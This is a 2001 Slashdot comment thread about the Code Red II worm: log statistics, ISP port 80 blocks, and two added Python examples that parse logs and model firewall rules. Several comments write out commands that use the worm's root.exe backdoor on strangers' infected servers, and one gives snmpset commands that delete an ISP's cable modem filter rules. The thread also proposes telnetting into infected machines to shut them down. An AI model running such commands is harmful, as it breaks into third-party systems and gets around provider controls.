    Why anyone would leave a printer sitting wide open on the wild net is beyond me, but apparently it's not acceptable to just tell the customers to put it behind a firewall where it belongs...

    --
    Chelloveck
    I give up on debugging. From now on, SIGSEGV is a feature.
  80. Re:Code Red Self Test by daknapp · · Score: 1
    Ohohoho. Practically all win2k users i know are infected. how amusing.

    Really? All the Win2k users you know are running IIS? That seems weird. Maybe your friends are just particularly stupid.

  81. Re:You misunderstand the danger by thogard · · Score: 1

    I was probing machines that probed me for a working root.exe and one machine was "owned" within 10 minutes of probing my cable modem connected box.
    Out of the original list of 39 or so that had a working root.exe, none of them are now responding to those requests because they are now under the control of someone else.

  82. Re:small survey by vtweb · · Score: 1

    Since Aug 1st, my class C block has experienced 109,666 code red infection attempts.

    83,499 are version II attempts.

    Of all attempts,
    30,388 are from 61.74.162.3
    14,550 are from 61.74.162.16
    13,111 are from 61.74.162.10

    The remaining source IPs are all sourcing less than 100 attempts each (most single attempts).

  83. Re:"Advanced Network Security Training" by Yorrike · · Score: 1
    Agreed.

    Especially since people are reporting attacks from Hotmail, of all places.

    .NET is going to be a fiasco if this is any indication (which it is).

    --

    Looks can be deceiving. Or CAN they?

  84. ASCII grapher for tracking Code Red by ip4noman · · Score: 1

    I've written a little ascii grapher which can be used to track Code Red from your apache logs.

    How to graph Code Red attacks by day:

    $ grep default.ida access_log | ./count_apache_date.byday | ./ascii_graph -c 2
    2001/07/19 18 xxxxxxxxxxxxxxxxxxxxxx
    2001/07/20 02 xx
    2001/08/01 11 xxxxxxxxxxxxx
    2001/08/02 25 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    2001/08/03 26 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    2001/08/04 27 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    2001/08/05 28 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    2001/08/06 29 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    2001/08/07 36 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    Source code with examples: (requires perl):
    http://www.ip4noman.org/code_red.tgz
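    As an added illustration (not ip4noman's Perl tools, which live at the URL above), here is a Python version of the same pipeline that also breaks the hits down by source IP the way the class C survey in comment 82 does, and tags each probe as the N-filler original worm, the X-filler newer variant, or a root.exe backdoor probe. The log lines inside it are constructed for the demo, and it matches any `.ida?` request rather than only `default.ida`, since the probe quoted later in the thread hits `NULL.ida`.

```python
"""Count Code Red probes in an Apache access log, by day, source and variant.

Added example; not the count_apache_date.byday / ascii_graph Perl scripts from
the post above.  Reads Apache common/combined log lines, keeps the ones that
look like Code Red traffic, and renders per-day ASCII bars.  SAMPLE_LOG is
constructed for the demonstration, not a real server log.
"""
import re
import sys
from collections import Counter

# Apache common/combined log prefix: host ident user [date] "request" status
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<day>\d{2})/(?P<mon>[A-Za-z]{3})/(?P<year>\d{4}):[^\]]*\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3})'
)
MONTHS = {m: i for i, m in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}

# Constructed sample lines, modelled on the probes quoted in the thread.
SAMPLE_LOG = """\
61.74.162.3 - - [01/Aug/2001:10:02:11 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090=a HTTP/1.0" 404 284 "-" "-"
61.74.162.3 - - [04/Aug/2001:23:11:45 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090=a HTTP/1.0" 404 284 "-" "-"
24.0.0.17 - - [04/Aug/2001:23:12:01 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090=a HTTP/1.0" 404 284 "-" "-"
24.0.0.17 - - [05/Aug/2001:00:00:59 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
24.0.0.17 - - [05/Aug/2001:00:01:00 -0400] "GET /NULL.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090=a HTTP/1.1" 404 284 "-" "-"
192.0.2.9 - - [05/Aug/2001:08:30:00 -0400] "GET /index.html HTTP/1.0" 200 1948 "-" "Mozilla/4.0"
"""


def classify(request):
    """Tag one request string ('GET /path HTTP/1.0').

    Returns 'v1' for the original worm (filler of N's before the %u bytes),
    'v2' for the newer variant (filler of X's), 'ida-other' for an .ida probe
    with some other filler, 'backdoor-probe' for a root.exe request (the
    backdoor left by the second variant, which later probes look for), or
    None for ordinary traffic.
    """
    parts = request.split()
    path = parts[1] if len(parts) >= 2 else ""
    lower = path.lower()
    if ".ida?" in lower:
        filler = path.split("?", 1)[1][:16]
        if filler.startswith("NNNN"):
            return "v1"
        if filler.startswith("XXXX"):
            return "v2"
        return "ida-other"
    if "root.exe" in lower:
        return "backdoor-probe"
    return None


def parse_log(text):
    """Return [(YYYY/MM/DD, source host, tag), ...] for Code Red-related lines."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not an Apache access-log line
        tag = classify(m.group("request"))
        if tag is None:
            continue                      # ordinary traffic, skip
        day = "%s/%02d/%s" % (m.group("year"), MONTHS[m.group("mon")], m.group("day"))
        hits.append((day, m.group("host"), tag))
    return hits


def count_by_day(hits):
    return Counter(day for day, _, _ in hits)


def count_by_source(hits, top=10):
    """Busiest sources first, like the per-IP breakdown in the survey reply."""
    return Counter(host for _, host, _ in hits).most_common(top)


def count_by_variant(hits):
    return Counter(tag for _, _, tag in hits)


def ascii_graph(counts, width=40):
    """Render {label: n} as 'label n xxxx' lines, longest bar scaled to width."""
    if not counts:
        return []
    peak = max(counts.values())
    return ["%s %3d %s" % (label, n, "x" * round(n * width / peak))
            for label, n in sorted(counts.items())]


if __name__ == "__main__":
    # Usage: python code_red_graph.py < access_log   (falls back to the sample)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    hits = parse_log(text)
    print("\n".join(ascii_graph(count_by_day(hits))))
    print("variants:", dict(count_by_variant(hits)))
    for host, n in count_by_source(hits):
        print("%6d %s" % (n, host))
```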

  85. Re:Twenty-four hours. by Fesh · · Score: 2
    *laugh* Damn... I don't know whether that deserves +1,Insightful or +1,Funny, but it definitely deserves a +1...

    --
    --Fesh
    Kill -9 'em all, let root@localhost sort 'em out.
  86. Re:Bring them to justice by WildBeast · · Score: 1

    That's not the case, he seems to be spreading it via email and his intentions are pretty bad.

  87. Re:Ease of Attack by beable · · Score: 1

    How about:
    root.exe?/c+explorer+mailto:billg@microsoft.com?Subject=Please make Windows into a secure operating system!
    If only I had a windows machine so that I could work out the right command...

    --
    ...
  88. Re:Cutting off port 80 by Refried+Beans · · Score: 1

    yes, but can you find a link to that page? I wasn't able to find it. Also, you can find that page under any topic by appending "&category_id=n" to the URL. The policy looks deprecated to me. The tech support agents need to be retrained.

  89. Re:Man, I wish... by Trepidity · · Score: 2

    That's exactly what I would say to the thousands of sysadmins who still insist on running Sendmail and BIND. Code Red on IIS reminds me a lot of the Morris Worm on Sendmail...

  90. Re:OT: pedantic correction by rkent · · Score: 1
    I don't know if it works, I don't have a Win box to test it on...

    LOL! I bow before your excellence.

  91. Re:Crikey by mcleodnine · · Score: 1

    Well then it's either "Lucky You!" or "You're looking at the wrong logs!"

    --
    one better than mcleodeight
  92. Re:Why code red is still around by iturbide · · Score: 1
    Get a clue. That's a proxy server passing on the request for an infected client.

    Mind you, you can configure those to not pass on Code Red requests. Which might be a Good Idea.

  93. Re:Small util for Windows to listen on port 80? by synthe · · Score: 1

    Thank you very much for this, I have no programming experience and I knew it had to be something relatively simple to do :) I'd like to file a bug report though, you have old and new swapped. The worms that use a series of N's are the old ones, and the worms that use X's are the new ones. I just thought it strange that in the last 10 hours my linux box got 22 new and 2 old attempts, while my windows box on the IP next to it got 47 "old" attempts and only 2 "new" attempts in about 16 hours. All in all, great program though. I used it on my machine at work and found that our main internal webserver was infected with the new strain, if it's available to the Internet as well as the intranet we have a problem (but not mine to fix).

  94. Re:Ease of Attack by aoeuid · · Score: 1

    Make sure to wrap it in quotation (%22) marks! =)

  95. Re:Cutting off port 80 by Fred+Ferrigno · · Score: 1
  96. Re:BIG NEWS: by ergo98 · · Score: 1

    I hardly think it's MCSEs that are the culprits for the spread of this virus: Instead it's full of themselves, sure they know everything wankers who installed IIS to show how 31337 they are (the first step of most "MCSEs" is to remove all of the unnecessary ISAPI modules, which are pretty much all of them. So far the .ada and .printer extensions, which are used by probably

  97. Re:Code red growth spurts by rlowe69 · · Score: 2

    A good portion of them have probably been unattached to the network, or will be brand new machines just for school.

    This may be insightful, but how many of these people will ACTUALLY be running a vulnerable web server? Only those that have installed IIS with Windows 2000! I am willing to bet that this number is negligible among college students, especially those with new computers. Those computers will most likely be running ME, which is less expensive and is more suitable for home/student use.

    Those students running Win9x or ME are NOT VULNERABLE to Code Red or CR II and those running NT4 are NOT VULNERABLE to Code Red II. This kind of FUD is what makes people panic. We don't need it in the news and we especially don't need it on Slashdot.

    --
    ----- rL
  98. Re:It is only Medium DAMAGE! by Trepidity · · Score: 2

    Just look at the information - if after the infection your mp3s and Word files are still there, and still seem the same as they were before, you have little damage. Sure, you might have to wipe and reinstall the OS, but your _data_ wasn't damaged, and you can pretty easily verify that.

  99. Re:Ease of Attack by Anonymous Coward · · Score: 0

    try GET /script/root.exe?/c+dir+c:\

  100. What it does by kimihia · · Score: 2, Informative

    I tried it out. This is what appeared in the log.

    - 216.201.108.18 - - [08/Aug/2001:19:29:45 +1200] "GET /scripts/root.exe?/c+dir+c:\ HTTP/1.0" 404 286 "-" "-"

    - 216.201.108.18 - - [08/Aug/2001:19:29:46 +1200] "GET / HTTP/1.0" 200 1948 "-" "-"

    210.zz.zz.zz 216.201.108.18 - - [08/Aug/2001:19:29:46 +1200] "GET /NULL.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=X HTTP/1.1" 404 284 "-" "-"

    - 216.201.108.18 - - [08/Aug/2001:19:29:48 +1200] "GET / HTTP/1.0" 200 1948 "-" "-"

    (I've snipped my IP BTW.)

    It looks like it is testing for:
    * Code Red 3 backdoor (found on all good Windows 2000 systems)
    * A web server
    * The ida overflow
    * A web server (again)

  101. Cable networks by J'raxis · · Score: 2

    By the way: The Code Red scans went dead yesterday morning on MediaOne.net (at least the 66.* where I am). It looks like they're blocking all connects on port 80 now.

  102. Re:Damage rating by Tony-A · · Score: 1

    You're using Unix criteria, not Microsoft Windows criteria. Remember, in the Microsoft Window world, mediocrity is an aspiration. Symantec hasn't lost their mind. They never had one to lose.

  103. Re:someone should make a code red three by GregGardner · · Score: 1

    That is amusing, but the Code Red III I would like to see would take control of your IIS server and then install the damn Code Red patch. Then after a day or so we wouldn't have to hear about this damn thing anymore.

  104. Let'S Stop CodeRedII - I Think We Can by Anonymous Coward · · Score: 0
    Alright, after answering the umpteenth call today, along the lines of: "Why is my cable modem light blinking non-stop?" I'm at wit's end. I don't even work for the cable modem provider. I'm just the village geek.

    We gotta put a stop to this.

    I think we can.

    Here's the deal. CodeRedII is out there, infecting anything that looks or smells like Windows 2000, running IIS 5.0 and Index Services. Happily, the worm writers are discovering that this pretty much covers the default installation of Win2K Server. Out of the box, it's happy to index the hard drive, and serve up web pages. Nice. This applies to any Win2K Server that hasn't been patched, or for which the owner hasn't shut down IIS or IDS, or both.

    CodeRedII does a couple of things -- first it intrudes on the box, overflowing a buffer and executing code. This code modifies explorer.exe and copies it around to make it a little easier to execute. Then, with the worm residing in memory, it seeks out other machines to infect -- voila, YOUR IP address gets hammered.

    But what about that modified explorer.exe? When the administrator logs in and runs explorer.exe, the modified version launches a telnet session. There's your backdoor. The infected server now has a telnet service running, with administrator permissions. All the hacker has to do is telnet to the box, and he/she owns it.

    So what can we do about it? I say we review our logs, see who's trying to infect us, telnet into the offending box and put a stop to it. You'll know by the three consecutive hits to your IP address, on port 80, from the infected server. Now, knowing the IP address, and surmising from these three hits that they're out looking for another box to infect, *WE* log on using the unprotected telnet session and issue the BORG sleep command. Sleeeeep. Sleeeeeeeeeeep. Or, in Microsoft parlance, SHUTDOWN.

    Who's with me? Gonna take some smarts to check syslogs and cable modem router logs to see who's been knocking, then telnet into the boxes to say 'shutdown'. Perhaps we can also write a little batch file to pop a message to the system operator, inviting them to PATCH their damned server.

  105. Cutting off port 80? by Heem · · Score: 1

    I know of at least one broadband provider that is completely shutting off access to machines known to be infected.. and not allowing them back on until they patch up. (well I imagine they must let them on to at least download the patch). If @home blocks my port 80 I'll be quite pissed. Yes I'm lame, I'm running IIS (patched) on my cable modem.

    --
    Don't Tread on Me
    1. Re:Cutting off port 80? by interiot · · Score: 5, Informative

      You can block incoming and outgoing http connections separately. eg. if a SYN packet is going from an outside address to an inside address, and the port number is 80, block it. But don't block anything else.

    2. Re:Cutting off port 80? by Atzanteol · · Score: 1

      I *am* pissed! I'm running Apache on mediaone's (read: att) network and can't get to my site...

      Funny how I had to read slashdot to find out though. I got no notice from att, and can't find a thing about it on any of their sites.

      --
      "Ignorance more frequently begets confidence than does knowledge"

      - Charles Darwin
    3. Re:Cutting off port 80? by bacchusrx · · Score: 1
      I'm not sure of the extent of AT&T's actions, but, they've probably blocked all incoming connections on port 80. This wouldn't prevent connections *to* port 80, of course, since web content itself is returned to the client on an ephemeral port...

      I've been afraid broadband providers would move to do this anyways... since in most cases the ISP explicitly forbids server activity on end-user systems. Rogers@Home, in my area, sets their cable modems to "sleep" after some predetermined interval-- this prevents any incoming connections unless the modem is awakened by outgoing traffic. Of course, putting "ping > /dev/null &" somewhere into your rc.local makes short work of that ;)

      BRx.

      --
      Life after capitalism? The participatory economics project
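      To make the distinction drawn in replies 1 and 3 concrete, here is an added model (not AT&T's, MediaOne's or any provider's real filter) of the two rules side by side: a blanket "anything touching port 80" block, and interiot's version that drops only SYN packets arriving from outside for an inside address on destination port 80. The subscriber block and the packets are constructed for the demonstration.

```python
"""Direction-aware port 80 filtering, modelled in Python.

Added example, not any provider's actual configuration.  It contrasts a
blanket port 80 block with a rule that only stops new inbound connections
to subscriber web servers, and shows what each does to the subscriber's own
browsing, to the replies that come back, and to an infected neighbour.
The subscriber network and the packet records are constructed.
"""
import ipaddress

SUBSCRIBERS = ipaddress.ip_network("24.0.0.0/24")   # constructed inside block


def inside(addr):
    return ipaddress.ip_address(addr) in SUBSCRIBERS


def blanket_port80(pkt):
    """Naive rule: drop anything that touches TCP port 80 in either direction.

    This also kills the subscriber's outgoing web requests and the replies
    to them, which is the outage several posters in the thread describe.
    """
    return pkt["proto"] == "tcp" and 80 in (pkt["sport"], pkt["dport"])


def inbound_web_syn(pkt):
    """Refined rule: drop only connection attempts from outside to an inside
    web server, i.e. SYN without ACK, destination port 80, outside -> inside.

    Replies to the subscriber's own browsing arrive with source port 80 and
    SYN+ACK toward an ephemeral port, so they pass (bacchusrx's point).
    """
    return (pkt["proto"] == "tcp" and pkt["dport"] == 80
            and "SYN" in pkt["flags"] and "ACK" not in pkt["flags"]
            and not inside(pkt["src"]) and inside(pkt["dst"]))


def apply_rule(rule, packets):
    """Return [(description, 'DROP' or 'PASS'), ...] for a packet list."""
    return [(p["what"], "DROP" if rule(p) else "PASS") for p in packets]


# Constructed traffic around a subscriber at 24.0.0.17.
TRAFFIC = [
    {"what": "worm scan from outside", "proto": "tcp", "src": "61.74.162.3",
     "dst": "24.0.0.17", "sport": 1234, "dport": 80, "flags": {"SYN"}},
    {"what": "subscriber opens a web page", "proto": "tcp", "src": "24.0.0.17",
     "dst": "198.51.100.5", "sport": 40123, "dport": 80, "flags": {"SYN"}},
    {"what": "web page reply to subscriber", "proto": "tcp", "src": "198.51.100.5",
     "dst": "24.0.0.17", "sport": 80, "dport": 40123, "flags": {"SYN", "ACK"}},
    # The next two are what the "what about people's machines on _their_
    # network" reply is worried about: an edge rule keyed on outside -> inside
    # does nothing about an infected subscriber scanning outward or sideways.
    {"what": "infected neighbour scans outward", "proto": "tcp", "src": "24.0.0.99",
     "dst": "203.0.113.7", "sport": 2048, "dport": 80, "flags": {"SYN"}},
    {"what": "neighbour scans another subscriber", "proto": "tcp", "src": "24.0.0.99",
     "dst": "24.0.0.17", "sport": 2049, "dport": 80, "flags": {"SYN"}},
]


if __name__ == "__main__":
    for name, rule in (("blanket port 80", blanket_port80),
                       ("inbound SYN to 80 only", inbound_web_syn)):
        print(name)
        for what, verdict in apply_rule(rule, TRAFFIC):
            print("  %-38s %s" % (what, verdict))
```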
    4. Re:Cutting off port 80? by aoeuid · · Score: 1

      Uh, you can cut off a port in one direction only you know......

    5. Re:Cutting Off Port 80? by Bonkers54 · · Score: 1

      I just got off the phone with the MediaOne tech-support and the person I spoke with said that "My supervisor told me that there is no way to unblock port 80 on your account" and she went on to tell me that until the virus has been stopped, it will not be unblocked. I think they should just block people's accounts completely that are infected and too dumb to patch their webserver, and if they'd like I could give them a list of every infected user generated nicely by my Apache logs. I don't see why they should have to block port 80 at all because the contract states that servers are not allowed, but I'm not complaining about them being loose on that.

    6. Re:Cutting off port 80? by Anonymous Coward · · Score: 2, Funny

      What, do you think they plan to ever turn port 80 back on? Trustworthy one, aren't ya?

    7. Re:Cutting off port 80? by Anonymous Coward · · Score: 0

      But what about people's machines on _their_ network that are infecting other people?

    8. Re:Cutting off port 80? by Anonymous Coward · · Score: 0

      you're not the only one. Verizon cut off port 80 last night and didn't tell any of their customers. They did at least make a note of it on their 'network status' page, but no proactive notification.

    9. Re:Cutting off port 80? by dodald · · Score: 1

      God I hope they don't do that here (RoadRunner Binghamton). I'm running Apache (1.3.17) and I have awstats running. I've gotten 1926 (as of 7:10 EDT) from the virus. If I had to run a MS operating system as a webserver I would trust apache more than IIS.

      --
      101010b 2Ah 52o
    10. Re:Cutting Off Port 80? by pbur · · Score: 1

      Running a webserver or a server of any sort is against the policy rules of MediaOne, or did you forget that? I have the service and remember specifically reading that in my agreement.

    11. Re:Cutting Off Port 80? by Anonymous Coward · · Score: 0
      Try connecting to your modem through SNMP, and unblocking it yourself (assuming it's blocked at the modems - it might be blocked using some other method). "ping -b 255.255.255.255" can often be used to find your modem's IP address, which should be in the 10.x.x.x block (you should get 2 replies, one from your modem, one from your router/CMTS).

      If your modem's community strings have not been modified, you can use "snmpwalk 10.x.x.x public ." to view the modem settings. "docsDev.docsDevMIBObjects.docsDevFilter" controls the filtering. Using "snmpset 10.x.x.x private docsDev.docsDevMIBObjects.docsDevFilter.docsDevFilterIpTable.docsDevFilterIpEntry.docsDevFilterIpStatus.1 i 6" should delete the first firewall rule. Using "...Status.2" will delete the second, etc.

      Some ISP's change the community strings from the defaults of public/private, or restrict access to certain IP addresses, making this much harder. You may be able to reset the defaults by using the modem's reset button (power cycling is not enough, and this only works on older modems - newer modems set the community strings through the modem config file, before you have an opportunity to access anything), but unless you know enough about SNMP to lock your ISP out of the modem, they'll probably restore the settings within a few hours.

    12. Re:Cutting Off Port 80? by Anonymous Coward · · Score: 0

      What's the raw OID for "docsDev.docsDevMIBObjects.docsDevFilter.docsDevFilterIpTable.docsDevFilterIpEntry.docsDevFilterIpStatus.1"? I don't have MIBS.

    13. Re:Cutting off port 80? by imevil · · Score: 1

      Yeah, I was running apache on port 80 too, and so suddenly I couldn't connect to the webpages from outside... Since the server is connected with Verizon I thought that it was some new sucky feature of this provider. I moved to port 8080. Thanks to /. I discovered that there was a good reason for that.

      I am wondering if the cable companies usually allow to put a server up.

      The company I am using now used to forbid it, and it used to have quotas too.

      E

    14. Re:Cutting off port 80? by niccodicco · · Score: 1

      AT&T's residential broadband division (MediaOne) has cut off port 80 across their network to try and halt the spread of the worm

      I don't really see how this will help either. If you're running an unpatched IIS connected to the net, you'd have been scanned and rooted a couple of thousand times by now. If you look at the graphs on incidents.org, you'll see the worm isn't really spreading any more. It's just flooding.

    15. Re:Cutting off port 80? by Kenyaman · · Score: 1

      MediaOne allows you to run servers? When I was trying to decide between cable and DSL, that was a deciding factor: Comcast@Home made an enormous deal about not running ANY servers on their network. Seems that, among other things, cable networks aren't all that great at returning data back upstream.

    16. Re:Cutting Off Port 80? by Sc00ter · · Score: 2
      NO, it's NOT against their policy.. perhaps you should read it first..

    17. Re:Cutting Off Port 80? by treke · · Score: 2

      My agreement stated it was unsupported, but not against the rules. This was also cleared up by contacting Mediaone (You just can't run any off of an undistributable list of prohibited servers)

    18. Re:Cutting off port 80? by Anonymous Coward · · Score: 0

      It's posts like this that makes me wish there was a -1, Stupid moderation.

  106. Medium damage by EndlessMe · · Score: 1

    Maybe that's because Symantec treats Microsoft software as non-popular and that's why this is not very dangerous :)))

    1. Re:Medium damage by Tackhead · · Score: 5, Insightful
      > > I don't understand why Symantec classifies a "remote root" exploit as only "medium" damage.

      Well, given the choice between having j00r box r00ted and having something like WinCIH blank out your BIOS and wipe out your FAT...

      For security, it's critical. But the amount of data loss is minimal until after someone telnets to the open port and blows away your drive.

      Finally, consider Symantec's core market -- not the guy running a brokerage firm on a farm of IIS boxen, but home and office users of PCs worried about the virus that'll wipe out their pr0n collection. Joe Win95er really isn't at risk from Code Red II, apart from wondering why "the Internet is slow" if he's on RoadRunner.

      Considering Symantec's core audience, and what this worm could be doing to compromised systems, and yeah, I'll buy "medium".

    2. Re:Medium damage by blang · · Score: 2
      nope. I think it's because everybody's got it, so the likelihood that anybody will bother doing anything really nasty to any given machine is small. We now have millions of machines exercising security by obscurity. I just hope all the IIS machines don't now gang up on the rest of the net.

      I'd just hope they'll have more imagination with their hacks. "Hacked by chinese" WTF? Spending all that time devising a crufty virus, and that's all they have to say? What a complete waste of human effort. Blackhats wearing diapers?

      --
      -- Another senseless waste of fine bytes.
  107. Gasp.... by JoeLinux · · Score: 1

    You mean Windows isn't secure? Network specialists are being PAID to figure this out? I wonder what happens if a consortium sits down and decides how to make the perfect virus...a friend of mine suggested that having it recompile itself on the system it hit, and contact the last instance of it to receive updates. Just a thought...

    JoeLinux

    1. Re:Gasp.... by eh2o · · Score: 1

      My god... that's a scary thought... a worm which can mutate its own binary? It could be a hard thing to squash with simple detection methods.

      It's all too easy to think of evil viruses which can be written... maybe that is why it keeps happening.. because it's just too easy not to try it. ;)

      It's kinda like the brass in the Pentagon talking about some new bio-weapons they made... danger schmanger joe, it was so easy to make this virus, we gotta try it out!

    2. Re:Gasp.... by Anonymous Coward · · Score: 0

      Most windows computers don't have compilers installed on them, so the approach would be best on bloated linux distros. Seriously, the only way CodeRed will go away is if someone writes a 'PatchRed' worm that infects every possible IIS server, then after a period of time downloads the hotfix, applies it and resets the server. The whole thing could be gone in 24 hours, the FBI and Microsoft would have to get a court order to do it (under the legal premise that allows fire fighters to trespass). Brian

  108. Intranet Code Red by Anonymous Coward · · Score: 0

    I work for a certain, um, large company that makes microprocessors and the Code Red has hit us particularly hard internally. We've had to take down a lot of the port 80 intranet applications and the packet storms are playing havoc with our email. It's driving everyone nuts!

  109. Ease of Attack by aoeuid · · Score: 1

    I did a little experimenting myself, and I absolutely cannot believe the ease at which you can get into these systems and download any file you wish (root.exe?/C+copy+file.txt+c:\inetpub\wwwroot). How this is not all over the media, considering the sheer number of infected hosts is beyond me.

    1. Re:Ease of Attack by Sawbones · · Score: 2, Interesting

      Myself I might be tempted to do

      root.exe?/C+echo+Do+it+>+C:\Documents+and+Settings\All+Users\Desktop\PATCH+YOUR+IIS.txt

      perhaps with a little more explanation than "Do IT".

      --

      Ad in classifieds: Pandora's Box (no box) $5
    2. Re:Ease of Attack by Anonymous Coward · · Score: 0

      I just tried GET /scripts/root.exe HTTP/1.0 on a few IPs listed in /var/log/httpd/access_log, and they all returned a copy of root.exe, not a shell prompt. No dice.

    3. Re:Ease of Attack by Anonymous Coward · · Score: 0

      I'd say the server's MIME is screwed if you're getting that.

  110. increasing number of scans by kajoob · · Score: 0, Redundant

    I'm running blackice defender (i know, i know, real men run firewalls at the network layer) however I'm up to about 8-9 scans or my port80 every hour and it seems to be increasing.

    --
    Quidquid latine dictum sit, altum videtur
  111. Network traffic seems high - is this why? by Jerf · · Score: 1

    I'm on an @home cable network, and for the last couple of days my little activity light has been blinking at an astonishingly high rate. Today I finally sniffed the network to see what it was, and it's an amazing rash of ARP requests... about 20 per second. Normal seems to be more like .5-1 per second. (The cable modem of course only allows me to see broadcast traffic and traffic meant for my network, and I don't normally see this much traffic.) Think this new Code Red is the reason why? Makes sense...

    1. Re:Network traffic seems high - is this why? by Anonymous Coward · · Score: 0

      Yes -- it is Code Red. The arp requests are coming from your default gateway looking for the MAC addresses of the hosts that are being scanned.

    2. Re:Network traffic seems high - is this why? by Aaaaaargh! · · Score: 1
      I'm on an @home cable network, and for the last couple of days my little activity light has been blinking at an astonishingly high rate.

      No, it isn't. At least according to the helpdesk drones. Level 2 support tries the old, "These are not the IPs you are looking for..." Jedi mindtrick.

      It certainly looks like the Code Red activity is to blame for the storm of ARP packets. Makes stealing @Home IPs rather easy right now, seeing as how ARP requests for identical IPs roll in about 1-2 times per minute. If only there were an example of an ARP exploit that could be tweaked to feed my paranoia...

      --
      Give them an inch and they'll take a foot. Much more than that, you won't have a leg to stand on.
    3. Re:Network traffic seems high - is this why? by VP · · Score: 2, Informative

      Yes - check the athome.* newsgroups for more details...

      Basically the new, "improved", Code Red is scanning close-by IP addresses, thus trying to find machines that may not even exist, or which are turned off at the moment. In this case, the @home gateway sends an ARP broadcast packet trying to find the IP address in question. This broadcast traffic causes the "activity" light to blink constantly... In my area, there is no performance degradation, though (yet).

    4. Re:Network traffic seems high - is this why? by VP · · Score: 1

      No, it isn't. At least according to the helpdesk drones. Level 2 support tries the old, "These are not the IPs you are looking for..." Jedi mindtrick.

      Slightly better here (Charter@Home):
      Saturday - "this is normal"
      Sunday - "We know we have a problem and we are working on it."

      Since there is no performance degradation (yet) I haven't even gone to level 2 support...

    5. Re:Network traffic seems high - is this why? by Anonymous Coward · · Score: 0, Interesting

      I also have an AT&T Cable modem, running Zone Alarm on my Win98 box. Previously, I would get around 15-20 alerts a day, with ZA blocking various traffic on a variety of ports. The past few days, I am getting an alert about every 90 seconds, with nearly all traffic on port 80.

  112. this thing is fascinating by BitchAss · · Score: 2, Interesting

    I gotta say this worm is really amazing. You can watch its growth in your log files. Mine roll over daily and you can see the file sizes increase day by day. On Aug 1 I had an 8k log file. The 2nd I had a 12k one. The third was 32k, the day after that was 64k. Today it was up to 192k so far and there's still another 2 hours till the log file rolls over.

    --
    Like sex? Read and write about it! Indecent Blogging
    1. Re:this thing is fascinating by garcia · · Score: 2

      I am noticing quite a bit of hits coming w/in 1-2 minutes of each other from the same IP. They come in three in a row now...

      I am apparently lucky as I have yet to see too too much traffic yet I feel it has only begun... :(

    2. Re:this thing is fascinating by Reality+Master+101 · · Score: 2

      Here's my hit graph:

      Aug 1: 17 hits (to default.ida)
      Aug 2: 37 hits
      Aug 3: 31 hits
      Aug 4: 305 hits (boom!)
      Aug 5: 474 hits
      Aug 6: 501 hits
      Aug 7: 256 hits (so far at 16:00)

      At least the trend seems to be a little down today. :)

      --
      Sometimes it's best to just let stupid people be stupid.
    3. Re:this thing is fascinating by Anonymous Coward · · Score: 0
      I'm getting hit harder now than on August 6 or 7.

      By 4 p.m., I've had 400+ attacks. I expect it to be 600 by midnight.

    4. Re:this thing is fascinating by TheReverend · · Score: 1

      Here's mine. I'm on a 24.x.x.x cable modem...

      Aug 1: 18 hits
      Aug 2: 0 hits
      Aug 3: 12 hits
      Aug 4: 35 hits
      Aug 5: 259 hits
      Aug 6: 357 hits
      Aug 7: 232 hits (as of 19:15)

      --


      "Let me open these blinds so the snipers can see in." - Kevin Giffhorn
    5. Re:this thing is fascinating by bjsvec · · Score: 1

      Log files from my small personal web server:

      # ls -alrt access_log*
      -rw-r--r-- 1 root root 1671 Apr 27 06:42 access_log.4
      -rw-r--r-- 1 root root 311987 May 31 17:28 access_log.3
      -rw-r--r-- 1 root root 968031 Jul 1 03:27 access_log.2
      -rw-r--r-- 1 root root 3015425 Jul 31 12:18 access_log.1
      -rw-r--r-- 1 root root 1163259 Aug 7 18:15 access_log

    6. Re:this thing is fascinating by refactored · · Score: 1
      Drool! With a measly total of 270 hits over all logs I think I'm heavily underpowered on the bandwidth side.

      Whine! Slobber! Drool!

    7. Re:this thing is fascinating by Marc+Boucher · · Score: 1

      It has been 51 hours since I re-opened outside access to my webserver (apache), to identify the type of attack. They were previously logged in my firewall but are not recognizable except for the port number: 80.
      I'm using Kryptolus' script to scan my logs and generate a report. Here is a snapshot of this report. (pages are currently not there, nbci seems to refuse ftp upload. I'll try later)
      The count is now at 1123 and still rising. The bulk of the connections is from my ISP's DSL network (in Belgium), but I'm also seeing attempts from outside: Hong Kong, Taiwan or Sweden for example. If these computers are trying each possible IP, think of the number of checks they have made before reaching me! ;)

    8. Re:this thing is fascinating by Anonymous Coward · · Score: 0

      I've had over 2558 hits since this whole thing started and they've been doubling in amount each day.

    9. Re:this thing is fascinating by chickenmilkbomb · · Score: 2, Funny


      This thing is great!
      My website has never seen so much traffic!
      Now I'm just going to sit back and watch the ad money roll in...

      If I wasn't so damn lazy, I would write a php
      script or a servlet and alias it to default.ida
      to autoupdate my "hit count".

      --
      He hates these cans!!!
